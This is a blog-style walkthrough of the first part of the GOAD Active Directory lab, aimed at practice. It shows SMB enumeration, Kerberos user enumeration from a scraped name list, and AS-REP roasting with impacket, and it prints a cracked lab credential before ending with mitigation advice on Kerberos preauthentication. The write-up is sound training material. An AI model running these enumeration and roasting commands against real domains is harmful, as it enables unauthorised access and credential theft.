Solving Game of Active Directory (GOAD) by Orange Cyberdefense Part-1
crackmapexec smb live_hosts
smb signing is disabled and version 1 is enabled for some hosts.
Domains identified:
sevenkingdoms.local
essos.localEnumerating smb shares:
We found that Guest access is allowed for smbshare “all” on 192.168.56.22(CASTELBLACK) machine.
Upon checking this share we found it is empty. But we had write permissions.
smbclient //192.168.56.22/all -U "test"Enumerating valid users from a list of potential users.
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/'| grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);
} }' > got_users.txt
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12AS-REP Roasting
impacket-GetNPUsers north.sevenkingdoms.local/brandon.stark -no-pass
these creds worked on 3 machines.
192.168.56.23 essos.local\brandon.stark:iseedeadpeople
192.168.56.22 north.sevenkingdoms.local\brandon.stark:iseedeadpeople
192.168.56.11 north.sevenkingdoms.local\brandon.stark:iseedeadpeopleMitigation for AS-REP Roasting
Upon Investigating the brandon.stark user, we came to know that this user has “Kerberos preauthentication disabled”.
Uncheck this option and run GetNPusers.py again.
So, we just need to make sure, this option is not enabled for any of the user.
When Kerberos Preauth requirement is disabled we directly get AS-REP in response to AS-REQ
where as when it is enabled we get “Preauth required” error.
Thanks for reading!
